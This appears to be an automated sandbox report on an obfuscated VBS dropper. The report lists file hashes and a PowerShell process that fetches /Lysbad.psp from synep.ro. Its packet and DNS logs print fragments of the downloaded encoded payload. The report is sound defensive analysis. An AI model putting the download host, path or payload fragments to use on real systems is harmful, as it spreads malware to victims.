                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gknezywg.lgx.ps1

                                Download File
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tgahyxoc.kig.ps1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Roaming\Udviklingsegnes.sep

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                Category:dropped
                                Size (bytes):445008
                                Entropy (8bit):5.860160877436521
                                Encrypted:false
                                SSDEEP:12288:s79x0Y2HZIOtxynkvVGNzDB671ThDB2s9Q:E0x5DtxynkvVGNzDBmtB2s9Q
                                MD5:5AA6003CF7732E15EDC986EFE8119483
                                SHA1:34DE9CBB0AD1CCCD509B05D2AFD00CE76D80B424
                                SHA-256:CFE3BCDDD69CF6FDDD4D04EBA24E8918B1140BF887A509B618AE48AEB708A8C2
                                SHA-512:62720DA12499C803A5A3B03E8E1FF0F20DEC0E1E7F81B85F116DBA45E3440147BD0F2F269A2055357C5DB121D4CA24665E5ED1697AB5092DFAED56EE7581702D
                                Malicious:false
                                Preview:cQGbcQGbu49pEgDrAnpU6wKROQNcJARxAZvrArXuuahoLaPrAmdJ6wJWkoHxHUv+JXEBm3EBm4HxtSPThusCtSXrAn4n6wJS3HEBm7rus+bUcQGb6wIICusCy03rAs0/McrrAtDzcQGbiRQLcQGbcQGb0eJxAZtxAZuDwQTrAu+icQGbgfkx+cEFfMxxAZvrAnIqi0QkBHEBm3EBm4nDcQGb6wJE5oHDxRdfBOsCGlTrAiC2ulNhK7FxAZvrAtsmgeoH36sEcQGb6wKg6IHCtH2AU+sCzXnrAuKQcQGbcQGbcQGb6wId9osMEOsCb4XrAuYriQwTcQGbcQGbQusCjp1xAZuB+oSjBAB11XEBm+sCzcOJXCQMcQGb6wJnD4HtAAMAAHEBm3EBm4tUJAhxAZtxAZuLfCQE6wLh03EBm4nrcQGb6wLzS4HDnAAAAHEBm3EBm1NxAZtxAZtqQHEBm3EBm4nr6wJ6pXEBm8eDAAEAAABw1wXrAu82cQGbgcMAAQAA6wJAZnEBm1PrAqddcQGbievrAjPzcQGbibsEAQAAcQGbcQGbgcMEAQAAcQGb6wIBa1PrAiqmcQGbav/rAqIGcQGbg8IFcQGb6wK0MDH2cQGbcQGbMclxAZtxAZuLGnEBm3EBm0FxAZtxAZs5HAp19HEBm+sCeklG6wK83+sCtGiAfAr7uHXd6wIt9usCOqyLRAr86wIZhXEBmynwcQGbcQGb/9JxAZvrAgPuuoSjBABxAZvrAo0hMcBxAZtxAZuLfCQMcQGbcQGbgTQH96h7EXEBm3EBm4PABOsC0U3rAikSOdB15HEBm+sCc0yJ++sCn47rApr8/9frAk+q6wIKAx+6exH3+MPauz1MLFeoexH4LPSe86gjSn5N8mQwFuiGgpT651juCth2XmQ1EY/61yqlZjzeXPBkMP3y9E73F4XkLIaQBgIz5tktopAGmtdMkym6QIBp3eY2Z0AUh28/HPcMZMmILLqQg6V7

                                Static File Info

                                General

                                File type:ASCII text, with CRLF line terminators
                                Entropy (8bit):5.151109026985318
                                TrID:
                                • Visual Basic Script (13500/0) 100.00%
                                File name:O1CZjzItH1.vbs
                                File size:30'452 bytes
                                MD5:250e1218609ed0d1e84e24290a5c3759
                                SHA1:cb11233eb647f9731ae643d959fa3f40a483f3aa
                                SHA256:adac32cc529c6b0b0bde007d733e51eb9b1c5de5df85e97680f954158bb90959
                                SHA512:11ef0c10a77517dff1757451962f65567287c5c38364a721b30ac3a64276e6116966ce6223dfa6476e5c161490b1d4db390d117f9fb09576f47cd4517852dda5
                                SSDEEP:384:XrCiPWsGHGX54OfdYFFYF2Iq4cS5Jw7lOBG:XeYAGp4S5Jw7lOBG
                                TLSH:5DD24B8AC8CA0FBD19A73BBDC444B4228C7862D2673759702674A4F4781F7935CACDE6
                                File Content Preview:Sub Evulge(Konvojtronbestigelser,Transiteranatoleallo,Filstrenggenman,Shelteunderskabe,Polleesammentrykni)..If Konvojtronbestigelser = cstr(2614147) Then ....Cirkusforestillinge41 = Space(69)....End If....while (Alkydmalingernesb<31)..Alkydmalingernesb =

                                File Icon

                                Icon Hash:68d69b8f86ab9a86

                                Network Behavior

                                Network Port Distribution

                                TCP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Oct 23, 2024 11:30:16.932413101 CEST49704443192.168.2.531.14.12.249
                                Oct 23, 2024 11:30:16.932518005 CEST4434970431.14.12.249192.168.2.5
                                Oct 23, 2024 11:30:16.932605982 CEST49704443192.168.2.531.14.12.249
                                Oct 23, 2024 11:30:16.940531969 CEST49704443192.168.2.531.14.12.249
                                Oct 23, 2024 11:30:16.940566063 CEST4434970431.14.12.249192.168.2.5
                                Oct 23, 2024 11:30:17.860059023 CEST4434970431.14.12.249192.168.2.5
                                Oct 23, 2024 11:30:17.860213041 CEST49704443192.168.2.531.14.12.249
                                Oct 23, 2024 11:30:17.865573883 CEST49704443192.168.2.531.14.12.249
                                Oct 23, 2024 11:30:17.865612984 CEST4434970431.14.12.249192.168.2.5
                                Oct 23, 2024 11:30:17.866156101 CEST4434970431.14.12.249192.168.2.5
                                Oct 23, 2024 11:30:17.880563974 CEST49704443192.168.2.531.14.12.249
                                Oct 23, 2024 11:30:17.923377991 CEST4434970431.14.12.249192.168.2.5
                                Oct 23, 2024 11:30:18.156778097 CEST4434970431.14.12.249192.168.2.5
                                Oct 23, 2024 11:30:18.156861067 CEST4434970431.14.12.249192.168.2.5
                                Oct 23, 2024 11:30:18.157058001 CEST49704443192.168.2.531.14.12.249
                                Oct 23, 2024 11:30:18.157124996 CEST4434970431.14.12.249192.168.2.5
                                Oct 23, 2024 11:30:18.199939966 CEST49704443192.168.2.531.14.12.249
                                Oct 23, 2024 11:30:18.259450912 CEST4434970431.14.12.249192.168.2.5
                                Oct 23, 2024 11:30:18.259490013 CEST4434970431.14.12.249192.168.2.5
                                Oct 23, 2024 11:30:18.259601116 CEST49704443192.168.2.531.14.12.249
                                Oct 23, 2024 11:30:18.303632021 CEST4434970431.14.12.249192.168.2.5
                                Oct 23, 2024 11:30:18.303673029 CEST4434970431.14.12.249192.168.2.5
                                Oct 23, 2024 11:30:18.303869009 CEST49704443192.168.2.531.14.12.249
                                Oct 23, 2024 11:30:18.308760881 CEST4434970431.14.12.249192.168.2.5
                                Oct 23, 2024 11:30:18.308785915 CEST4434970431.14.12.249192.168.2.5
                                Oct 23, 2024 11:30:18.308861971 CEST49704443192.168.2.531.14.12.249
                                Oct 23, 2024 11:30:18.308895111 CEST49704443192.168.2.531.14.12.249
                                Oct 23, 2024 11:30:18.405627012 CEST4434970431.14.12.249192.168.2.5
                                Oct 23, 2024 11:30:18.405738115 CEST49704443192.168.2.531.14.12.249
                                Oct 23, 2024 11:30:18.406405926 CEST4434970431.14.12.249192.168.2.5
                                Oct 23, 2024 11:30:18.406482935 CEST49704443192.168.2.531.14.12.249
                                Oct 23, 2024 11:30:18.450373888 CEST4434970431.14.12.249192.168.2.5
                                Oct 23, 2024 11:30:18.450485945 CEST49704443192.168.2.531.14.12.249
                                Oct 23, 2024 11:30:18.451734066 CEST4434970431.14.12.249192.168.2.5
                                Oct 23, 2024 11:30:18.451823950 CEST49704443192.168.2.531.14.12.249
                                Oct 23, 2024 11:30:18.453326941 CEST4434970431.14.12.249192.168.2.5
                                Oct 23, 2024 11:30:18.453414917 CEST49704443192.168.2.531.14.12.249
                                Oct 23, 2024 11:30:18.455069065 CEST4434970431.14.12.249192.168.2.5
                                Oct 23, 2024 11:30:18.455159903 CEST49704443192.168.2.531.14.12.249
                                Oct 23, 2024 11:30:18.459270000 CEST4434970431.14.12.249192.168.2.5
                                Oct 23, 2024 11:30:18.459357977 CEST49704443192.168.2.531.14.12.249
                                Oct 23, 2024 11:30:18.521889925 CEST4434970431.14.12.249192.168.2.5
                                Oct 23, 2024 11:30:18.522015095 CEST49704443192.168.2.531.14.12.249
                                Oct 23, 2024 11:30:18.565579891 CEST4434970431.14.12.249192.168.2.5
                                Oct 23, 2024 11:30:18.565759897 CEST49704443192.168.2.531.14.12.249
                                Oct 23, 2024 11:30:18.566523075 CEST4434970431.14.12.249192.168.2.5
                                Oct 23, 2024 11:30:18.566595078 CEST49704443192.168.2.531.14.12.249
                                Oct 23, 2024 11:30:18.568048000 CEST4434970431.14.12.249192.168.2.5
                                Oct 23, 2024 11:30:18.568135977 CEST49704443192.168.2.531.14.12.249
                                Oct 23, 2024 11:30:18.597735882 CEST4434970431.14.12.249192.168.2.5
                                Oct 23, 2024 11:30:18.597841978 CEST49704443192.168.2.531.14.12.249
                                Oct 23, 2024 11:30:18.598722935 CEST4434970431.14.12.249192.168.2.5
                                Oct 23, 2024 11:30:18.598800898 CEST49704443192.168.2.531.14.12.249
                                Oct 23, 2024 11:30:18.636792898 CEST4434970431.14.12.249192.168.2.5
                                Oct 23, 2024 11:30:18.636920929 CEST49704443192.168.2.531.14.12.249
                                Oct 23, 2024 11:30:18.668195963 CEST4434970431.14.12.249192.168.2.5
                                Oct 23, 2024 11:30:18.668354988 CEST49704443192.168.2.531.14.12.249
                                Oct 23, 2024 11:30:18.681781054 CEST4434970431.14.12.249192.168.2.5
                                Oct 23, 2024 11:30:18.681930065 CEST49704443192.168.2.531.14.12.249
                                Oct 23, 2024 11:30:18.683593035 CEST4434970431.14.12.249192.168.2.5
                                Oct 23, 2024 11:30:18.683684111 CEST49704443192.168.2.531.14.12.249
                                Oct 23, 2024 11:30:18.712023973 CEST4434970431.14.12.249192.168.2.5
                                Oct 23, 2024 11:30:18.712256908 CEST49704443192.168.2.531.14.12.249
                                Oct 23, 2024 11:30:18.713382006 CEST4434970431.14.12.249192.168.2.5
                                Oct 23, 2024 11:30:18.713466883 CEST49704443192.168.2.531.14.12.249
                                Oct 23, 2024 11:30:18.715519905 CEST4434970431.14.12.249192.168.2.5
                                Oct 23, 2024 11:30:18.715599060 CEST49704443192.168.2.531.14.12.249
                                Oct 23, 2024 11:30:18.752578020 CEST4434970431.14.12.249192.168.2.5
                                Oct 23, 2024 11:30:18.752691031 CEST49704443192.168.2.531.14.12.249
                                Oct 23, 2024 11:30:18.783622980 CEST4434970431.14.12.249192.168.2.5
                                Oct 23, 2024 11:30:18.783745050 CEST49704443192.168.2.531.14.12.249
                                Oct 23, 2024 11:30:18.797372103 CEST4434970431.14.12.249192.168.2.5
                                Oct 23, 2024 11:30:18.797559023 CEST49704443192.168.2.531.14.12.249
                                Oct 23, 2024 11:30:18.798595905 CEST4434970431.14.12.249192.168.2.5
                                Oct 23, 2024 11:30:18.798682928 CEST49704443192.168.2.531.14.12.249
                                Oct 23, 2024 11:30:18.827676058 CEST4434970431.14.12.249192.168.2.5
                                Oct 23, 2024 11:30:18.827785015 CEST49704443192.168.2.531.14.12.249
                                Oct 23, 2024 11:30:18.828788996 CEST4434970431.14.12.249192.168.2.5
                                Oct 23, 2024 11:30:18.828991890 CEST49704443192.168.2.531.14.12.249
                                Oct 23, 2024 11:30:18.830063105 CEST4434970431.14.12.249192.168.2.5
                                Oct 23, 2024 11:30:18.830142975 CEST49704443192.168.2.531.14.12.249
                                Oct 23, 2024 11:30:18.867660046 CEST4434970431.14.12.249192.168.2.5
                                Oct 23, 2024 11:30:18.867762089 CEST49704443192.168.2.531.14.12.249
                                Oct 23, 2024 11:30:18.899513960 CEST4434970431.14.12.249192.168.2.5
                                Oct 23, 2024 11:30:18.899631023 CEST49704443192.168.2.531.14.12.249
                                Oct 23, 2024 11:30:18.912158966 CEST4434970431.14.12.249192.168.2.5
                                Oct 23, 2024 11:30:18.912302971 CEST49704443192.168.2.531.14.12.249
                                Oct 23, 2024 11:30:18.913933039 CEST4434970431.14.12.249192.168.2.5
                                Oct 23, 2024 11:30:18.914021015 CEST49704443192.168.2.531.14.12.249
                                Oct 23, 2024 11:30:18.930593967 CEST4434970431.14.12.249192.168.2.5
                                Oct 23, 2024 11:30:18.930888891 CEST49704443192.168.2.531.14.12.249
                                Oct 23, 2024 11:30:18.943850040 CEST4434970431.14.12.249192.168.2.5
                                Oct 23, 2024 11:30:18.944029093 CEST49704443192.168.2.531.14.12.249
                                Oct 23, 2024 11:30:18.945209026 CEST4434970431.14.12.249192.168.2.5
                                Oct 23, 2024 11:30:18.945286989 CEST49704443192.168.2.531.14.12.249
                                Oct 23, 2024 11:30:18.981729984 CEST4434970431.14.12.249192.168.2.5
                                Oct 23, 2024 11:30:18.981864929 CEST49704443192.168.2.531.14.12.249
                                Oct 23, 2024 11:30:18.993362904 CEST4434970431.14.12.249192.168.2.5
                                Oct 23, 2024 11:30:18.993454933 CEST49704443192.168.2.531.14.12.249
                                Oct 23, 2024 11:30:19.015692949 CEST4434970431.14.12.249192.168.2.5
                                Oct 23, 2024 11:30:19.015914917 CEST49704443192.168.2.531.14.12.249
                                Oct 23, 2024 11:30:19.028153896 CEST4434970431.14.12.249192.168.2.5
                                Oct 23, 2024 11:30:19.028245926 CEST49704443192.168.2.531.14.12.249
                                Oct 23, 2024 11:30:19.030256987 CEST4434970431.14.12.249192.168.2.5
                                Oct 23, 2024 11:30:19.030443907 CEST49704443192.168.2.531.14.12.249
                                Oct 23, 2024 11:30:19.058957100 CEST4434970431.14.12.249192.168.2.5
                                Oct 23, 2024 11:30:19.059056044 CEST49704443192.168.2.531.14.12.249
                                Oct 23, 2024 11:30:19.060312033 CEST4434970431.14.12.249192.168.2.5
                                Oct 23, 2024 11:30:19.060379982 CEST49704443192.168.2.531.14.12.249
                                Oct 23, 2024 11:30:19.061600924 CEST4434970431.14.12.249192.168.2.5
                                Oct 23, 2024 11:30:19.061702013 CEST49704443192.168.2.531.14.12.249
                                Oct 23, 2024 11:30:19.097346067 CEST4434970431.14.12.249192.168.2.5
                                Oct 23, 2024 11:30:19.097464085 CEST49704443192.168.2.531.14.12.249
                                Oct 23, 2024 11:30:19.130620956 CEST4434970431.14.12.249192.168.2.5
                                Oct 23, 2024 11:30:19.130717039 CEST49704443192.168.2.531.14.12.249
                                Oct 23, 2024 11:30:19.131979942 CEST4434970431.14.12.249192.168.2.5
                                Oct 23, 2024 11:30:19.132045984 CEST49704443192.168.2.531.14.12.249
                                Oct 23, 2024 11:30:19.143640041 CEST4434970431.14.12.249192.168.2.5
                                Oct 23, 2024 11:30:19.143719912 CEST49704443192.168.2.531.14.12.249
                                Oct 23, 2024 11:30:19.145406008 CEST4434970431.14.12.249192.168.2.5
                                Oct 23, 2024 11:30:19.145469904 CEST49704443192.168.2.531.14.12.249
                                Oct 23, 2024 11:30:19.174885988 CEST4434970431.14.12.249192.168.2.5
                                Oct 23, 2024 11:30:19.175093889 CEST49704443192.168.2.531.14.12.249
                                Oct 23, 2024 11:30:19.176681995 CEST4434970431.14.12.249192.168.2.5
                                Oct 23, 2024 11:30:19.176753044 CEST49704443192.168.2.531.14.12.249
                                Oct 23, 2024 11:30:19.178323030 CEST4434970431.14.12.249192.168.2.5
                                Oct 23, 2024 11:30:19.178384066 CEST49704443192.168.2.531.14.12.249
                                Oct 23, 2024 11:30:19.212930918 CEST4434970431.14.12.249192.168.2.5
                                Oct 23, 2024 11:30:19.213022947 CEST49704443192.168.2.531.14.12.249
                                Oct 23, 2024 11:30:19.214550972 CEST4434970431.14.12.249192.168.2.5
                                Oct 23, 2024 11:30:19.214618921 CEST49704443192.168.2.531.14.12.249
                                Oct 23, 2024 11:30:19.214622021 CEST4434970431.14.12.249192.168.2.5
                                Oct 23, 2024 11:30:19.214675903 CEST49704443192.168.2.531.14.12.249
                                Oct 23, 2024 11:30:19.217427969 CEST49704443192.168.2.531.14.12.249

                                UDP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Oct 23, 2024 11:30:13.966641903 CEST5679153192.168.2.51.1.1.1
                                Oct 23, 2024 11:30:13.981745958 CEST53567911.1.1.1192.168.2.5
                                Oct 23, 2024 11:30:16.775146961 CEST6340253192.168.2.51.1.1.1
                                Oct 23, 2024 11:30:16.926510096 CEST53634021.1.1.1192.168.2.5

                                DNS Queries

                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                Oct 23, 2024 11:30:13.966641903 CEST192.168.2.51.1.1.10x5c9bStandard query (0)gormezl_6777.6777.6777.677eA (IP address)IN (0x0001)false
                                Oct 23, 2024 11:30:16.775146961 CEST192.168.2.51.1.1.10x1c9dStandard query (0)synep.roA (IP address)IN (0x0001)false

                                DNS Answers

                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                Oct 23, 2024 11:30:13.981745958 CEST1.1.1.1192.168.2.50x5c9bName error (3)gormezl_6777.6777.6777.677enonenoneA (IP address)IN (0x0001)false
                                Oct 23, 2024 11:30:16.926510096 CEST1.1.1.1192.168.2.50x1c9dNo error (0)synep.ro31.14.12.249A (IP address)IN (0x0001)false

                                HTTP Request Dependency Graph

                                • synep.ro

                                HTTPS Proxied Packets

                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.54970431.14.12.2494433136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                TimestampBytes transferredDirectionData
                                2024-10-23 09:30:17 UTC162OUTGET /Lysbad.psp HTTP/1.1
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                Host: synep.ro
                                Connection: Keep-Alive
                                2024-10-23 09:30:18 UTC209INHTTP/1.1 200 OK
                                Date: Wed, 23 Oct 2024 09:30:18 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Last-Modified: Mon, 21 Oct 2024 08:56:42 GMT
                                Accept-Ranges: bytes
                                Content-Length: 445008
                                2024-10-23 09:30:18 UTC7983INData Raw: 63 51 47 62 63 51 47 62 75 34 39 70 45 67 44 72 41 6e 70 55 36 77 4b 52 4f 51 4e 63 4a 41 52 78 41 5a 76 72 41 72 58 75 75 61 68 6f 4c 61 50 72 41 6d 64 4a 36 77 4a 57 6b 6f 48 78 48 55 76 2b 4a 58 45 42 6d 33 45 42 6d 34 48 78 74 53 50 54 68 75 73 43 74 53 58 72 41 6e 34 6e 36 77 4a 53 33 48 45 42 6d 37 72 75 73 2b 62 55 63 51 47 62 36 77 49 49 43 75 73 43 79 30 33 72 41 73 30 2f 4d 63 72 72 41 74 44 7a 63 51 47 62 69 52 51 4c 63 51 47 62 63 51 47 62 30 65 4a 78 41 5a 74 78 41 5a 75 44 77 51 54 72 41 75 2b 69 63 51 47 62 67 66 6b 78 2b 63 45 46 66 4d 78 78 41 5a 76 72 41 6e 49 71 69 30 51 6b 42 48 45 42 6d 33 45 42 6d 34 6e 44 63 51 47 62 36 77 4a 45 35 6f 48 44 78 52 64 66 42 4f 73 43 47 6c 54 72 41 69 43 32 75 6c 4e 68 4b 37 46 78 41 5a 76 72 41 74 73
                                Data Ascii: cQGbcQGbu49pEgDrAnpU6wKROQNcJARxAZvrArXuuahoLaPrAmdJ6wJWkoHxHUv+JXEBm3EBm4HxtSPThusCtSXrAn4n6wJS3HEBm7rus+bUcQGb6wIICusCy03rAs0/McrrAtDzcQGbiRQLcQGbcQGb0eJxAZtxAZuDwQTrAu+icQGbgfkx+cEFfMxxAZvrAnIqi0QkBHEBm3EBm4nDcQGb6wJE5oHDxRdfBOsCGlTrAiC2ulNhK7FxAZvrAts
                                2024-10-23 09:30:18 UTC8000INData Raw: 32 54 71 68 58 34 5a 64 59 64 2b 79 76 64 53 6b 65 58 35 4c 65 59 57 31 36 6d 4e 4e 66 49 66 6d 79 4c 48 38 52 4f 77 63 50 39 64 75 4c 5a 4a 70 58 46 44 6e 50 79 71 39 36 47 37 61 71 39 46 77 77 6b 56 73 58 50 35 53 6f 43 47 6a 59 38 74 62 34 71 53 59 52 39 36 68 37 45 66 65 6f 65 78 48 33 71 48 30 34 46 74 58 67 70 66 65 55 33 48 54 2b 4b 5a 54 70 54 38 68 36 6b 44 42 51 30 33 48 32 2b 38 43 74 30 41 4b 32 6b 41 54 30 49 33 41 70 4b 5a 41 5a 52 57 42 64 6b 42 7a 63 4d 66 70 4d 4b 59 68 31 64 62 39 4b 52 6d 73 68 6e 42 44 6f 4e 66 37 6d 68 37 53 67 63 76 78 36 64 6f 37 42 71 58 36 70 4f 7a 39 4b 31 37 30 63 32 76 74 61 2b 57 54 38 54 46 5a 55 33 6f 75 49 73 47 6a 41 55 6f 42 47 75 55 47 41 4b 72 43 59 63 4e 4c 4a 65 2f 70 73 68 35 75 30 45 66 65 6e 39 6a
                                Data Ascii: 2TqhX4ZdYd+yvdSkeX5LeYW16mNNfIfmyLH8ROwcP9duLZJpXFDnPyq96G7aq9FwwkVsXP5SoCGjY8tb4qSYR96h7EfeoexH3qH04FtXgpfeU3HT+KZTpT8h6kDBQ03H2+8Ct0AK2kAT0I3ApKZAZRWBdkBzcMfpMKYh1db9KRmshnBDoNf7mh7Sgcvx6do7BqX6pOz9K170c2vta+WT8TFZU3ouIsGjAUoBGuUGAKrCYcNLJe/psh5u0Efen9j
                                2024-10-23 09:30:18 UTC8000INData Raw: 33 49 5a 68 43 66 44 58 4b 45 50 65 6f 4b 36 6d 2f 2b 67 6a 32 77 67 72 52 52 6f 71 64 65 42 6a 54 4d 76 49 4a 55 54 5a 5a 32 4f 6f 43 66 43 43 2f 72 4b 76 35 38 56 44 57 76 69 48 53 4b 4a 2f 57 64 54 6c 4a 70 42 50 69 51 74 71 44 2b 76 71 6a 2b 58 37 68 64 6c 75 42 6d 4d 79 59 2b 75 49 75 71 73 35 43 64 6d 76 54 47 61 30 50 38 67 72 4a 72 4b 6b 61 48 74 46 6d 4a 58 42 43 6c 38 44 37 56 46 31 65 6d 50 50 79 68 45 2b 70 65 78 46 2b 63 69 6d 61 59 68 42 36 45 66 66 35 77 6d 51 52 4a 72 53 51 4e 6d 2b 58 77 62 38 70 6b 70 4b 66 39 32 4f 59 39 68 37 32 30 56 49 74 6c 59 57 62 63 65 42 47 77 71 67 32 71 42 49 31 30 69 68 53 47 75 33 35 37 77 6c 33 38 50 39 6b 49 75 34 6e 38 50 4b 45 6b 61 70 37 45 61 59 52 47 75 48 6e 38 2f 72 34 75 76 6d 55 4d 33 5a 5a 62 56
                                Data Ascii: 3IZhCfDXKEPeoK6m/+gj2wgrRRoqdeBjTMvIJUTZZ2OoCfCC/rKv58VDWviHSKJ/WdTlJpBPiQtqD+vqj+X7hdluBmMyY+uIuqs5CdmvTGa0P8grJrKkaHtFmJXBCl8D7VF1emPPyhE+pexF+cimaYhB6Eff5wmQRJrSQNm+Xwb8pkpKf92OY9h720VItlYWbceBGwqg2qBI10ihSGu357wl38P9kIu4n8PKEkap7EaYRGuHn8/r4uvmUM3ZZbV
                                2024-10-23 09:30:18 UTC8000INData Raw: 58 37 75 78 4a 72 68 4b 2f 6e 30 63 74 4b 4b 72 47 79 59 33 74 64 6c 74 48 64 69 50 30 2b 75 4c 36 72 31 6d 78 6f 44 54 79 39 76 61 33 35 69 6b 6d 32 33 47 45 2f 6d 72 6b 61 5a 73 4c 67 4f 69 6a 68 36 38 61 4c 7a 2f 68 70 30 6b 74 71 55 35 79 61 69 44 35 43 4c 68 2f 45 58 34 74 67 78 48 33 71 49 67 65 4d 4a 68 37 45 66 65 6f 65 78 48 33 71 48 73 52 2f 4f 56 32 77 50 71 32 64 42 41 42 35 58 73 52 39 36 68 37 45 66 65 6f 65 78 48 45 64 4a 78 30 76 75 68 54 54 57 69 6a 61 39 39 47 41 36 47 41 2b 71 69 39 47 49 36 4f 48 49 6a 32 6f 41 74 61 5a 47 72 77 5a 4e 63 70 76 52 48 6e 71 58 75 59 63 74 39 35 45 66 63 51 4e 30 72 56 36 33 37 33 49 58 32 34 52 30 6b 51 2b 6f 51 47 4b 59 32 48 6f 4d 48 38 6b 41 47 64 36 57 65 79 4b 59 31 61 76 53 4a 49 6d 4f 6d 2f 48 79
                                Data Ascii: X7uxJrhK/n0ctKKrGyY3tdltHdiP0+uL6r1mxoDTy9va35ikm23GE/mrkaZsLgOijh68aLz/hp0ktqU5yaiD5CLh/EX4tgxH3qIgeMJh7EfeoexH3qHsR/OV2wPq2dBAB5XsR96h7EfeoexHEdJx0vuhTTWija99GA6GA+qi9GI6OHIj2oAtaZGrwZNcpvRHnqXuYct95EfcQN0rV6373IX24R0kQ+oQGKY2HoMH8kAGd6WeyKY1avSJImOm/Hy
                                2024-10-23 09:30:18 UTC8000INData Raw: 72 68 43 71 6f 53 77 68 6c 47 48 5a 42 73 45 6f 52 73 76 72 67 52 76 34 77 66 48 5a 5a 64 72 58 52 6e 2f 72 67 75 68 38 75 70 61 55 30 38 76 50 2b 6f 75 61 55 4c 64 4e 33 59 6d 63 64 61 6a 32 6d 31 4d 44 42 43 65 69 6f 49 42 6b 37 69 68 69 39 51 69 35 68 4d 2f 70 45 6b 72 31 71 6a 71 6b 31 69 51 67 46 63 2f 67 74 61 63 55 58 56 37 61 44 67 6a 32 51 69 74 54 61 47 2f 65 6f 64 4a 7a 71 2b 58 73 52 72 53 69 42 56 4b 34 68 7a 6f 48 32 71 48 75 59 43 66 37 77 70 47 65 70 65 78 47 52 70 37 77 6a 39 36 68 37 45 66 65 6f 65 78 48 33 71 45 6f 54 71 69 50 54 79 56 63 78 70 42 73 53 72 39 79 4d 65 57 79 38 69 64 6b 79 47 2f 69 50 6a 71 78 4d 79 75 4e 74 34 61 4a 70 38 6f 53 30 71 6e 73 52 54 61 61 32 50 61 59 70 69 63 73 5a 65 51 56 44 54 64 7a 72 37 6a 4d 70 69 59
                                Data Ascii: rhCqoSwhlGHZBsEoRsvrgRv4wfHZZdrXRn/rguh8upaU08vP+ouaULdN3Ymcdaj2m1MDBCeioIBk7ihi9Qi5hM/pEkr1qjqk1iQgFc/gtacUXV7aDgj2QitTaG/eodJzq+XsRrSiBVK4hzoH2qHuYCf7wpGepexGRp7wj96h7EfeoexH3qEoTqiPTyVcxpBsSr9yMeWy8idkyG/iPjqxMyuNt4aJp8oS0qnsRTaa2PaYpicsZeQVDTdzr7jMpiY
                                2024-10-23 09:30:18 UTC8000INData Raw: 6d 48 6a 39 44 7a 6e 4b 49 64 2f 2f 33 6a 4e 44 76 64 4a 77 4f 72 57 54 6c 48 71 64 49 73 42 73 52 38 6b 77 4e 52 30 78 70 46 73 38 62 39 2b 6c 71 2b 46 70 57 6c 50 6a 44 57 64 34 42 41 53 54 42 6c 35 50 72 77 6b 63 68 56 52 4b 64 6b 33 64 35 72 30 35 76 33 43 4d 5a 6d 4d 38 57 4b 44 59 4c 6e 35 35 73 52 61 4a 49 4b 42 43 5a 42 37 53 71 48 4e 49 37 41 70 54 56 2f 4b 72 48 73 6f 35 37 6e 6b 39 58 5a 4b 36 47 44 52 72 55 47 39 6c 42 6c 4c 37 38 66 76 41 72 71 52 51 56 76 41 6a 43 4d 4c 41 42 6a 35 32 57 78 2f 67 58 66 6e 75 58 6a 31 70 43 61 79 47 59 45 50 51 31 2f 38 43 43 76 77 6f 30 7a 76 31 6b 47 6f 73 56 2f 47 6f 58 6c 55 49 55 50 41 57 55 77 2b 45 4b 4e 44 33 63 76 71 51 61 68 2f 71 34 35 30 49 30 6f 5a 7a 4f 64 2f 37 4b 72 50 37 46 70 34 51 53 4f 35
